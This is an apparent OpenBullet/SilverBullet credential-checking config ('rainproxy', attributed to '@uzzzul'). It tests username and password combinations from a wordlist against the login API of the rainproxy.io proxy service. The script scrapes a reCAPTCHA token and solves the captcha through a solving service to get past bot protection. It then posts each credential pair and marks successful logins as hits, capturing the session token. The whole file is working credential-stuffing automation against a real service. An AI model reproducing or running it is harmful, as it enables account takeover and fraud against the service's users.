[SETTINGS]
{
  "Name": "rainproxy",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2021-12-25T22:04:39.1344412+02:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@uzzzul",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "rainproxy",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#USER FUNCTION URLEncode "<USER>" -> VAR "USER" 

#PASS FUNCTION URLEncode "<PASS>" -> VAR "PASS" 

#GET_ANCHOR REQUEST GET "https://www.google.com/recaptcha/api2/anchor?ar=1&k=6LdaGssUAAAAAFMBwO3VPUNlV6pZE_uIY04zK8dh&co=aHR0cHM6Ly9kYXNoYm9hcmQucmFpbnByb3h5LmlvOjQ0Mw..&hl=en&type=image&v=VZKEDW9wslPbEc9RmzMqaOAP&theme=light&size=normal&badge=bottomright&cb=bb3p35fk7c6x" 
  
  HEADER "User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#tk PARSE "<SOURCE>" LR "type=\"hidden\" id=\"recaptcha-token\" value=\"" "\"" -> VAR "tk" 

#SOLVE SOLVECAPTCHA ReCaptchaV2 "6LdaGssUAAAAAFMBwO3VPUNlV6pZE_uIY04zK8dh" "https://dashboard.rainproxy.io" 

#LOGIN REQUEST POST "https://api.rainproxy.io/api/user/login" 
  CONTENT "{\"username\":\"<USER>\",\"password\":\"<PASS>\",\"g-recaptcha-response\":\"<tk>\",\"recaptcha\":\"<SOLUTION>\"}" 
  CONTENTTYPE "application/json" 
  HEADER ": scheme: https" 
  HEADER "accept: application/json, text/plain, */*" 
  HEADER "accept-encoding: gzip, deflate, br" 
  HEADER "accept-language: en-US,en;q=0.9" 
  HEADER "content-length: 1103" 
  HEADER "content-type: application/json;charset=UTF-8" 
  HEADER "origin: https://dashboard.rainproxy.io" 
  HEADER "referer: https://dashboard.rainproxy.io/" 
  HEADER "sec-fetch-dest: empty" 
  HEADER "sec-fetch-mode: cors" 
  HEADER "sec-fetch-site: same-site" 
  HEADER "sec-gpc: 1" 
  HEADER "user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Username Parameter is missing" 
    KEY "Invalid captcha string. Please try again." 
    KEY "Invalid credentials." 
  KEYCHAIN Success OR 
    KEY "Login Successful !" 

#token PARSE "<SOURCE>" JSON "token" -> VAR "1" 

#author FUNCTION Constant "@uzzzul" -> CAP "configby" 

